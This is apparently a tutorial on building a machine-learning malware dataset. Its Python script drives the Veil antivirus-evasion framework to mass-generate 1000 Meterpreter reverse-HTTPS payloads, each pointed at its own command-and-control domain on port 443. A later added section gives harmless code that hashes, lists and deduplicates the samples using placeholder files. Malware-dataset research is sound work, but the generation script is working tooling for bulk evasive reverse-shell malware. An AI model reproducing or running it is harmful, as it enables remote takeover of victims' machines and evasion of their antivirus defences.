https://github.com/Veil-Framework
Objective: Generation of 1000 VEIL payloads each with a unique C&C domain name and binary name.
Purpose: Creation of malware dataset for Machine Learning
Background: VEIL framework in itself is a payload generation framework designed for evasion of Anti-Virus.
Overview:
1) On a Kali Linux VM
2) Install VEIL framework
apt update
apt -y install veil
/usr/share/veil/config/setup.sh --force --silent
3) Save the following script as veil_malware_generation_script.py:

import pandas as pd
import socket
from socket import error as socket_error
import subprocess

# read the domain names to use
print("Reading domain names from csv file:")
df = pd.read_csv('./website.csv')
df.info()
df.describe()
print("Loaded domain name file")
print("")

# Veil prints correctmsg on success; errmsg is a transient Ruby error that is retried
correctmsg = "Metasploit Resource file written to:"
errmsg = "bignum too big to convert"
# set startfrom to a row index to resume an interrupted run
startfrom = 0

for index, row in df.iterrows():
    if startfrom > index:
        print("skip: " + str(row[1]))
        continue
    attempt = 1
    # resolve the domain; the resolved address is only printed, the command below
    # still passes the domain name itself (uncomment the 2 lines below to use the
    # resolved ip address instead)
    try:
        addr = socket.gethostbyname(row[0])
        print(addr)
    except socket_error as serr:
        if serr.errno == -2:
            print("Domain: " + row[0] + " is unresolvable, using default IP value instead.")
            row[0] = "127.0.0.1"
    command = "-t Evasion -p cs/meterpreter/rev_https.py --ip " + row[0] + " --port 443"
    binaryname = str(row[1]) + ".exe"
    print(command)
    # set i to any positive number to start the loop
    i = 9999
    x = -1
    while x == -1:
        proc = subprocess.Popen(['./Veil.py', '-t', 'Evasion', '-p', 'cs/meterpreter/rev_https.py',
                                 '--ip', str(row[0]), '--port', '443', '-o', str(row[1])],
                                stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        # communicate() returns bytes on Python 3; decode so the string searches below work
        tmp = proc.communicate()[0].decode('utf-8', 'replace')
        x = tmp.find(correctmsg)
        # -1 means errmsg was not found, implying that crafting was successful
        i = tmp.find(errmsg)
        # print("i value:" + str(i))
        if i != -1:
            print("retrying error crafting payload...: attempting " + str(attempt) + " times")
            attempt = attempt + 1
        if x == -1:
            print("error: " + tmp)
            attempt = attempt + 1
    print("Command: " + command + " is successful.")
    print("Saving as :" + binaryname)
    # subprocess.call('mv ./windows-meterpreter-staged-reverse-https-443.exe ./' + binaryname, shell=True)
    print("Saved")
    print("")
4) Create a CSV file using Excel with the following format and save it as website.csv:
5) Execute the Python script
cd /usr/share/veil
python veil_malware_generation_script.py
7) VEIL is really fast: generating the 1000 malware samples took about 20 minutes.
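Once the samples exist, an ML dataset still needs a manifest tying each binary back to its domain and a content hash, plus a check that the 1000 files really are distinct (two byte-identical outputs would be one sample with two labels, not two samples). The following is an added example, not code from the original post or from the Veil project. It assumes website.csv has a header row followed by two columns, domain then binary name (the generation script indexes row[0] and row[1]), and that the compiled samples land in one output directory as <name>.exe. The demo writes throwaway placeholder files into a temporary directory, not real payloads.

```python
import csv
import hashlib
import os
import tempfile


def sha256_file(path):
    """Hex SHA-256 of a file, read in chunks so large samples do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(csv_path, output_dir):
    """Pair every (domain, name) row of website.csv with its compiled sample.

    Returns (rows, duplicates): rows is a list of dicts with domain, name, path,
    sha256 (None when the sample is missing) and size; duplicates maps a hash to
    the sample names sharing it, only for hashes seen more than once.
    Assumed CSV layout: header row, then domain,name per data row.
    """
    rows = []
    seen = {}
    with open(csv_path, newline="") as f:
        reader = csv.reader(f)
        next(reader, None)  # skip the header row
        for rec in reader:
            if len(rec) < 2:
                continue
            domain, name = rec[0].strip(), rec[1].strip()
            path = os.path.join(output_dir, name + ".exe")
            if os.path.isfile(path):
                digest = sha256_file(path)
                size = os.path.getsize(path)
                seen.setdefault(digest, []).append(name)
            else:
                digest, size = None, 0
            rows.append({"domain": domain, "name": name, "path": path,
                         "sha256": digest, "size": size})
    duplicates = {d: names for d, names in seen.items() if len(names) > 1}
    return rows, duplicates


def write_manifest(rows, out_path):
    """Write the manifest as CSV; returns how many rows actually have a sample on disk."""
    fields = ["domain", "name", "path", "sha256", "size"]
    with open(out_path, "w", newline="") as f:
        w = csv.DictWriter(f, fieldnames=fields)
        w.writeheader()
        w.writerows(rows)
    return sum(1 for r in rows if r["sha256"] is not None)


def demo():
    """Constructed scenario: three CSV rows, two compiled files with identical
    content (a rerun that produced the same bytes twice) and one missing sample.
    Placeholder bytes only, not real binaries."""
    base = tempfile.mkdtemp()
    csv_path = os.path.join(base, "website.csv")
    with open(csv_path, "w", newline="") as f:
        w = csv.writer(f)
        w.writerow(["domain", "name"])  # header row (assumed layout)
        w.writerow(["example.com", "sample001"])
        w.writerow(["example.org", "sample002"])
        w.writerow(["example.net", "sample003"])
    out_dir = os.path.join(base, "compiled")
    os.makedirs(out_dir)
    for name in ("sample001", "sample002"):
        with open(os.path.join(out_dir, name + ".exe"), "wb") as f:
            f.write(b"PLACEHOLDER-NOT-A-REAL-BINARY")
    rows, dups = build_manifest(csv_path, out_dir)
    present = write_manifest(rows, os.path.join(base, "manifest.csv"))
    return rows, dups, present


if __name__ == "__main__":
    rows, dups, present = demo()
    print("samples present:", present, "of", len(rows))
    for digest, names in dups.items():
        print("duplicate content", digest[:12], "shared by", names)
```

For a real run, point build_manifest at the website.csv used by the generation script and at the directory the compiled binaries were moved into; any entry in the duplicates map is a sample to drop before training, and any row with sha256 None is a generation that silently failed.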